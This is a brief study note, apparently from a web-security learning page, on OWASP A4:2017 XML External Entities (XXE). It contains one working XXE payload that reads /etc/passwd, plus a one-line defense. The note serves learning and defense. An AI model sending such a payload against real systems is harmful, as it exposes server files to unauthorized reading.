Definition

A4:2017-XML External Entities (XXE)

DTD : Document type definition

XEE attack

<aside> 📗 Look for XEE payload

</aside>

<aside> 📗 type bypass can be report

</aside>

XXE: Local File Inclusion Example for unix system

<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

Defense

Disable XML External Entities